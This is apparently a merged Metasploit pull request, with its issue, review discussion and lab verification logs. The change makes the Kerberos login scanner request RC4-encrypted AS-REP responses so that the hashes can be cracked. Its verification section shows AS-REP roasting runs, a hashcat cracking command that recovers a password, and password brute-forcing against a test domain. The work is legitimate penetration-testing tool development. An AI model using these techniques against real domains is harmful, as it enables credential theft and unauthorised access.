### PR TITLE
Get crackable ASREP hashes

### LINKED ISSUE #17988: auxiliary/gather/get_user_spns does not output a breakable encryption format of Kerberos AS-REP message
## Steps to reproduce
Nothing special, just use auxiliary/gather/get_user_spns to perform ASREPRosting attack to break the password of a user with preauthentication disabled. 

The encrypted AS_REP using as a key the nt hash should be breakable. The attack is working in the same setup lab with impacket GetNPUsers.py but not with metasploit module.

Possible cause --> Different formats for hashcat

metasploit output has number 18 in the encryption ($krb5asrep$18): 

> [+] 10.20.30.229 - User: "asrep" does not require preauthentication. Hash: $krb5asrep$ 18$asrep@MARVEL.LOCAL:e55958ef14ffeeac15e685cf45fd0055$16acdacee9300127b8de96b31908291189bae698343a839fa47830a8721ec90bfeb1aeab02fda8f6fd63aa8d19fd15fdc1ccd0507ce53b08d9e33888552bca764ab2f3437ca8c17312f3db3717c5d0f72fb7a74247347e0eae944ba0179ece4520c46a3e1929d141c3b27837afb7e64f07b16f7785ab39f92356cd839f2c018cbdfe96644500b1b0d8507ffeb42f511a9f0e09523f4acaddc54a3e7dc8e07522a74275eb319543af2d3e810a730595a4eead49ff0e1f5ce38cf6002b14c944d61f15366b1da9181df7b2ac18c546ab0185b3b58ed0262739539df99ec67a041391315cbb3c85a4667142305f16ca8417996cac620034bfb2318468ddbe87dc  

Impacket GetNPUsers output has number 23 in the encryption ($krb5asrep$23) and has more bytes: 
> $krb5asrep$ 23$asrep@MARVEL.LOCAL:25467ccad28d361022ffb544bec42898$338e5d814ed500db12a57fbabdfdb78d937c9264beb0429755f9b8e88b4602d4415c99fac9ad635617ff299d0fe3966a2dd6405918a550cc153ccd724202cca266eddf89dee1763c4482630da9cf623f49c79783d48499203ce1fd61adc001f18de6fdc08bfbecf810fb49a95a2daf16851ed6adb192b774378ecfe605338fb74e732e470a6187913aaa30fc810f6a49461c907961060a9ef7bb5941d92cec899621d55fe8aabe433c67dc493dfdb0af9f47a5f3c9a1d5e9f2e9ce5b7627dd15f04ad9f00102a89cfb491b609b2bdfedaea9ee6c6d8a9bb36654bf47bc619285ed5140f4b698adb29551a1e3

## Were you following a specific guide/tutorial or reading documentation?
Based on the metasploit documentation

https://docs.metasploit.com/docs/pentesting/active-directory/kerberos/kerberos_login.html

## Expected behavior
Hashcat should be able to break the key as it is in my dictionary (Nt password pash).

## Current behavior
Hashcat cannot break the key (Nt password pash).

### Metasploit version
Framework Version: 6.3.4-dev

### PR DESCRIPTION
**Pull request by smashery**
This PR fixes the ASREP roasting workflow in Metasploit, which resolves #17988. A note on that ticket: That ticket states that the behaviour (and thus the bug) is in the `get_user_spns` module, but that module is actually TGS-REP roasting (kerberoasting), and I was unable to reproduce any issues with that module. But the issue correctly describes a replicable issue in the `kerberos_login` module, so that's what this ticket addresses.

The cause of this issue was that, when we offer AES ciphers alongside our RC4 cipher, the server complies, and gives us an ASREP encrypted with one of the AES ciphers. Cracking this is slow, and is not currently supported by JtR or Hashcat, so is less valuable. To fix this, we just tell the server that we only support RC4_HMAC, and it gives us what we want.

If we made only this change, it would potentially break the login scanner in the (admittedly rare) situation where RC4 has been disabled in the domain. So if we receive an "encryption type not supported" error, we retry with our defaults.

## Verification

- [ ] Configure a domain containing a user with pre-authentication disabled
- [ ] Start `msfconsole`
- [ ] `use kerberos_login`
- [ ] Run the module against the pre-auth-disabled user
- [ ] Verify that the output has etype 23
- [ ] Verify that the hash is crackable by hashcat, using a wordlist containing the correct password: `hashcat -m18200 '$krb5asrep$23$user...' -a 3 --force /tmp/wordlist`
- [ ] Verify that the `kerberos_login` module still works to brute force passwords for users without pre-auth disabled
- [ ] Verify that the `kerberos_login` module still works to brute force passwords for users without pre-auth disabled, when RC4 is disabled in the domain (In Group Policy, Computer Configuration >> Windows Settings >> Security Settings >> Local Policies >> Security Options >> "Network security: Configure encryption types allowed for Kerberos")

### CODE REVIEW

**Comment by jvoisin** [comment]
> Cracking this is slow, and is not currently supported by JtR or Hashcat, so is less valuable.

It might be worth opening an issue to both of them to get this added :P

**Comment by h00die** [comment]
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat

Looks like it is supported by at least hashcat? Untried. But @smashery 's ticket says it's not supported and then cracks it with hashcat anyways, so I'm a bit confused.

@smashery I guess I'm the hash and crack person for msf, and had planned to take a look at this tomorrow. If I see things (formatters etc) to get this working, I'll send you a PR

**Comment by adfoster-r7** [comment]
Preferencing RC4_HMAC for the default offered etype makes sense to me - I believe this was the default/only behavior before all of the awesome work to support additional etypes was added 😄

**Comment by adfoster-r7** [comment]
The docs call out using hashcat for ASREPRoasting [here](https://docs.metasploit.com/docs/pentesting/active-directory/kerberos/kerberos_login.html#asreproasting) ([Permalink](https://github.com/rapid7/metasploit-framework/blob/90cf371376afd29ca9b6836ddf7ca591c861f415/documentation/modules/auxiliary/scanner/kerberos/kerberos_login.md#asreproasting]))

But on reflection the docs aren't super great, since it doesn't really call out when you should use john or hashcat, or that 18200 isn't always correct depending on the negotiated etype:

> | 18200 | Kerberos 5, etype 23, AS-REP | $krb5asrep$23$user@domain.com:3e156ada591263b8aab0965f5aebd837$0074 |
> https://hashcat.net/wiki/doku.php?id=example_hashes

**Comment by smashery** [comment]
@h00die - to clarify the apparent discrepancy: cracking ASREPs _is_ supported by Hashcat... as long as the DC encrypts the ASREP it with the `RC4_HMAC` etype. If the DC encrypts the ASREP with, say, AES256 or AES128, it's theoretically crackable... but it's not currently supported by Hashcat (and if it were, would be hella slow, so we prefer RC4). The bug described here is that when MSF receives an ASREP from a DC that supports AES, it will be encrypted with AES - which is not currently supported by Hashcat. So by telling the DC "I only support RC4_HMAC", it will send us an ASREP encrypted with RC4_HMAC, which _is_ currently supported by Hashcat.

**Comment by h00die** [comment]
this fell off my radar, go ahead and land it, and ill get another PR later to put the hash cracking/identification/etc in all the things. No sense holding it up

File: lib/metasploit/framework/login_scanner/kerberos.rb [hunk 1]
```diff
@@ -23,12 +23,22 @@ def attempt_login(credential)
...
-              password: credential.private,
-              realm: credential.realm
-            )
+            begin
+              res = send_request_tgt(
+                server_name: server_name,
+                client_name: credential.public,
+                password: credential.private,
+                realm: credential.realm,
+                offered_etypes: [Rex::Proto::Kerberos::Crypto::Encryption::RC4_HMAC]
```
Comment (adfoster-r7) [inline lib/metasploit/framework/login_scanner/kerberos.rb:32]: Was wondering if we would request normal encryption types by default, and maybe only in the ASREP roasting scenario we try to downgrade to RC4_HMAC? 🤔 

That way we're not making double requests against modern boxes that reject RC4_HMAC etype

Comment (smashery) [reply lib/metasploit/framework/login_scanner/kerberos.rb]: I've implemented that approach with the new commit.

**Comment by jheysel-r7** [comment]
Changes look good and testing was as expected. Thanks for the PR as well as the detailed verification steps.

## Verification

- [x]  Configure a domain containing a user with pre-authentication disabled
	- [x] Windows Server 2019 AD - Administrator account pre-auth disabled
- [x]  Start `msfconsole`
- [x]  `use kerberos_login`
- [x]  Run the module against the pre-auth-disabled user
```
msf6 auxiliary(scanner/kerberos/kerberos_login) > run

[*] Using domain: EXAMPLE.COM - 172.16.199.132:88    ...
[+] 172.16.199.132 - User: "administrator" does not require preauthentication. Hash: $krb5asrep$23$administrator@EXAMPLE.COM:9aaf5d03670c5ad820f07937676e6797$2a0dd260cf0722a5aa2fd9bba54893dd9495a4cfb22c53b0be28106a73aea9789ac88e4a992b20e577b773a91446f67b3446a695afb35eadadca5978ec498aa91e40a6743e661f7ea19b1fa5a43a321cb0869385b51ff6dabbe311b125c89ecc56c173da4895801a614ec2375df35f2313cec39e187abda21eb969a08010e5a68b11043b8524cdab95f78690492d04bb9dbecba6ec2563144741b0876d29134a3a423f807aee59013a4969e92c395baaa6388f6f3d5ed76304f0f5f044b5dfd758b78ea27ca3895d89861abc84ccc4bbb5acbfbf64b6016c93794e74a36f158f7a54e782c34b007317
[!] No active DB -- Credential data will not be saved!
[*] Auxiliary module execution completed
```
- [x]  Verify that the output has etype 23
- [x]  Verify that the hash is crackable by hashcat, using a wordlist containing the correct password: `hashcat -m18200 '$krb5asrep$23$user...' -a 3 --force /tmp/wordlist`

```
└─$ hashcat -m18200 '$krb5asrep$23$administrator@EXAMPLE.COM:9aaf5d03670c5ad820f07937676e6797$2a0dd260cf0722a5aa2fd9bba54893dd9495a4cfb22c53b0be28106a73aea9789ac88e4a992b20e577b773a91446f67b3446a695afb35eadadca5978ec498aa91e40a6743e661f7ea19b1fa5a43a321cb0869385b51ff6dabbe311b125c89ecc56c173da4895801a614ec2375df35f2313cec39e187abda21eb969a08010e5a68b11043b8524cdab95f78690492d04bb9dbecba6ec2563144741b0876d29134a3a423f807aee59013a4969e92c395baaa6388f6f3d5ed76304f0f5f044b5dfd758b78ea27ca3895d89861abc84ccc4bbb5acbfbf64b6016c93794e74a36f158f7a54e782c34b007317' -a 3 --force wordlist
hashcat (v6.1.1) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz, 1407/1471 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.                             
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 134 MB
The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).                                                          
Unless you supply more work, your cracking speed will drop.                                                                            
For tips on supplying more work, see: https://hashcat.net/faq/morework                                                                 
Approaching final keyspace - workload adjusted.  
$krb5asrep$23$administrator@EXAMPLE.COM:9aaf5d03670c5ad820f07937676e6797$2a0dd260cf0722a5aa2fd9bba54893dd9495a4cfb22c53b0be28106a73aea9789ac88e4a992b20e577b773a91446f67b3446a695afb35eadadca5978ec498aa91e40a6743e661f7ea19b1fa5a43a321cb0869385b51ff6dabbe311b125c89ecc56c173da4895801a614ec2375df35f2313cec39e187abda21eb969a08010e5a68b11043b8524cdab95f78690492d04bb9dbecba6ec2563144741b0876d29134a3a423f807aee59013a4969e92c395baaa6388f6f3d5ed76304f0f5f044b5dfd758b78ea27ca3895d89861abc84ccc4bbb5acbfbf64b6016c93794e74a36f158f7a54e782c34b007317:N0tpassword!                                                                              
                                                                                                                                                                                                                                                                                                                           
Session..........: hashcat                                                                                                             
Status...........: Cracked                
Hash.Name........: Kerberos 5, etype 23, AS-REP                   
Hash.Target......: $krb5asrep$23$administrator@EXAMPLE.COM:9aaf5d03670...007317
Time.Started.....: Mon Oct  2 12:34:57 2023, (0 secs)
Time.Estimated...: Mon Oct  2 12:34:57 2023, (0 secs)
Guess.Mask.......: N0tpassword! [12]
Guess.Queue......: 1/1 (100.00%)         
Speed.#1.........:        8 H/s (0.08ms) @ Accel:64 Loops:1 Thr:64 Vec:8             
Recovered........: 1/1 (100.00%) Digests               
Progress.........: 1/1 (100.00%)     
Rejected.........: 0/1 (0.00%)             
Restore.Point....: 0/1 (0.00%)               
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1               
Candidates.#1....: N0tpassword! -> N0tpassword!
Started: Mon Oct  2 12:34:27 2023
Stopped: Mon Oct  2 12:34:58 2023
```

- [x]  Verify that the `kerberos_login` module still works to brute force passwords for users without pre-auth disabled

Revert the pre-auth disabled setting for the Administrator account, then test:
```
msf6 auxiliary(scanner/kerberos/kerberos_login) > set pass_file /tmp/wordlist
pass_file => /tmp/wordlist
msf6 auxiliary(scanner/kerberos/kerberos_login) > run

[*] Using domain: EXAMPLE.COM - 172.16.199.132:88    ...
[+] 172.16.199.132 - User: "administrator" is present
[!] No active DB -- Credential data will not be saved!
[*] 172.16.199.132 - User: "administrator" wrong password derp
[*] 172.16.199.132 - User: "administrator" wrong password derp2
[+] 172.16.199.132 - User found: "administrator" with password N0tpassword!. Hash: $krb5asrep$18$administrator@EXAMPLE.COM:6b0ed000c7ec840ba3a38954820518ec$0d612d817a2ef3ad4f5c1d01248011f8ce54a8c67a58217841bd4f1b0797884fe9595c9942452058aea621373475e753e3cf1b75ea9a0b3477b8f8802f58ddd5838e37f070978011a1b7578fd0b8d5f5045dc7b1705102543ec59a04cf305debb2d67d5eba38f5e24a2f42fd6fc6327ba6181fa11b8635bcd43e9f260db6a4c498268fb2da47492e9b6dc27127526343ebc21ac5ea3848b229480a649e913a57b031c6cbd4a130e1dfffce030a1e48ab6e4ddbf785a39aac888f77d9ce37c1048ecb78f550bcaae90fb7fdda82068d9323f51eddb8b9d8584f5b3eb0e2bed97d794ad0c6c98498fd4881c1163b3c6bd7a3647b077c9025e9fbd7f883fc
[*] Auxiliary module execution completed
```


- [x]  Verify that the `kerberos_login` module still works to brute force passwords for users without pre-auth disabled, when RC4 is disabled in the domain (In Group Policy, Computer Configuration >> Windows Settings >> Security Settings >> Local Policies >> Security Options >> "Network security: Configure encryption types allowed for Kerberos")
  
  Disable `RC4`:
![Screenshot 2023-10-02 at 12 58 48 PM](https://github.com/rapid7/metasploit-framework/assets/23320005/e61e6192-7184-4e6c-9c0e-28b95aad9b57)


Force update the Group Policy changes:
```
C:\Users\Administrator>gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.


C:\Users\Administrator>
```

Confirm brute forcing still works:
```
msf6 auxiliary(scanner/kerberos/kerberos_login) > run

[*] Using domain: EXAMPLE.COM - 172.16.199.132:88    ...
[+] 172.16.199.132 - User: "administrator" is present
[!] No active DB -- Credential data will not be saved!
[*] 172.16.199.132 - User: "administrator" wrong password derp
[*] 172.16.199.132 - User: "administrator" wrong password derp2
[+] 172.16.199.132 - User found: "administrator" with password N0tpassword!. Hash: $krb5asrep$18$administrator@EXAMPLE.COM:b5d7a0474c555586d0f3f2675df80ffa$770942c968b49cedc33d296ae038ae06873786011dbcd2794ea0463563192a8cac1040085caa9f0e0dffdc24d6cf511a0772dab938c3cd6e36ee725b5979cb4cfb9d93c509cf97c1866d8684666ea33bcdf1f837d472ce449b3d72fef017bcccd52a0b43e1672d25d1273cf6d13892055c9200e69f1a98df8f689b8ea54cbca9cf251a3bb349f038f172190fbd1621698f4aea89c0ac45d2125176e625237af5c460b38601127d2e9161561e69c30175f8cb8b0f2f54237b1c482e4f1fa201a98852c50c8be9493450d16cb4ff8a1f9e032c5e2a68f21fb354a76a96d5818c23dbda875a6115dbf348e9a7627e1ad45e3ace2d2a47262cd88551db420c
[*] Auxiliary module execution completed
```

**Comment by jheysel-r7** [comment]
# Release Notes
This PR updates the kerberos.rb library such that when a kerberos login is attempted, on a user where pre-authentication is not required, the module now requests a RRC4-HMAC ticket, since it's more easily crackable.

**Pull request merged**